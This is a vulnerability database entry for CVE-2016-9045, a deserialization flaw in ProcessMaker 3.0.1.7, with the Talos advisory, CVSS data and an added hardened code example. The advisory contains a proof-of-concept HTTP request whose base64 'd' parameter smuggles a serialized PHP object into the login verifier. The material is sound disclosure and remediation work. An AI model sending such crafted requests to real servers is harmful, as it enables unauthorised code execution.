CVE-2016-9045 - Deserialization of Untrusted Data vulnerability in Processmaker 3.0.1.7

CVSS 8.8 - HIGH
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: LOW
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH

Tags: network, low complexity, processmaker, CWE-502

Summary

A code execution vulnerability exists in ProcessMaker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

Vulnerable Configurations

Part         Description   Count
Application  Processmaker  1

Common Weakness Enumeration (CWE)

CWE-502 - Deserialization of Untrusted Data
Seebug

bulletinFamily: exploit
description:

### Summary

A code execution vulnerability exists in ProcessMaker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

### Tested Versions

ProcessMaker Enterprise Core 3.0.1.7-community

### Product URLs

https://www.processmaker.com/community-2

### CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

### CWE

CWE-502 - Deserialization of Untrusted Data

### Details

It was discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type. The following proof-of-concept request demonstrates the issue:

```
GET /sysworkflow/en/neoclassic/login/sysLoginVerify.php?d=TzoxNToiTXlTUUxDb25uZWN0aW9uIjoyOntzOjY6IgAqAGRzbiI7TjtzOjg6IgAqAGZsYWdzIjtpOjA7fQ== HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/sysworkflow/en/neoclassic/login/login?u=%2Fsysworkflow%2Fen%2Fneoclassic%2Fadmin%2FpmLogo
Connection: close
```

The following code was found to be responsible for the unsafe deserialization:

```php
// Any client can supply "d": it is base64-decoded and handed straight to
// unserialize(), so the request decides which classes get instantiated.
if (array_key_exists("d", $_GET)) {
    $_POST = unserialize(base64_decode($_GET["d"]));
}

if (! isset ($_POST)) {
    G::header('location: /sys/' . $lang . '/' . SYS_SKIN . '/' . 'login/login');
}
if (isset($_SESSION['sysLogin'])) {
    $_POST['form'] = $_SESSION['sysLogin'];
}

require_once 'authentication.php';
```

### Mitigation

Restrict access to known, trusted users and hosts.

### Timeline

* 2016-04-28 - Vendor Disclosure
* 2017-07-19 - Public Release

### CREDIT

* Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.
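A hardened replacement for the sysLoginVerify.php fragment quoted above, added here as an example; it is not ProcessMaker's own fix. It assumes PHP 7.1 or later (for the allowed_classes option of unserialize() and nullable return types), and the helper names decodeLoginFields and isScalarTree are invented.

```php
<?php
// Added example, not ProcessMaker's code. Assumes PHP >= 7.1; helper names are
// invented. Keeps the base64+serialize wire format the application already emits
// for "d", but never lets the request instantiate a class.

/** True if $value is a scalar/null or an array (nested at most 4 deep) of such values. */
function isScalarTree($value, int $depth = 0): bool
{
    if ($depth > 4) {
        return false;                         // bound nesting of attacker input
    }
    if (is_array($value)) {
        foreach ($value as $child) {
            if (!isScalarTree($child, $depth + 1)) {
                return false;
            }
        }
        return true;
    }
    return $value === null || is_scalar($value);
}

/** Decode the "d" parameter into a plain array of form fields, or null if rejected. */
function decodeLoginFields(string $encoded): ?array
{
    $raw = base64_decode($encoded, true);     // strict: reject non-base64 bytes
    if ($raw === false || $raw === '') {
        return null;
    }
    // allowed_classes => false maps every object to __PHP_Incomplete_Class, whose
    // __wakeup()/__destruct() never run; isScalarTree() then rejects it outright.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data) || !isScalarTree($data)) {
        return null;
    }
    return $data;
}

// Drop-in for the vulnerable block: malformed or object-bearing input is refused.
if (array_key_exists('d', $_GET)) {
    $fields = decodeLoginFields((string) $_GET['d']);
    if ($fields === null) {
        http_response_code(400);
        exit('Invalid login parameter');
    }
    $_POST = $fields;
}
```

Where the wire format can be changed, the stronger option is to stop accepting serialized PHP in a URL parameter altogether and carry the login state in the server-side session (as the $_SESSION['sysLogin'] branch already does) or in a signed JSON token.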
id: SSV:96471
last seen: 2017-11-19
modified: 2017-09-14
published: 2017-09-14
reporter: Root
title: ProcessMaker Enterprise Core Code Execution Vulnerability (CVE-2016-9045)

Talos

id: TALOS-2017-0314
last seen: 2019-05-29
published: 2017-07-19
reporter: Talos Intelligence
source: http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0314
title: ProcessMaker Enterprise Core Code Execution Vulnerability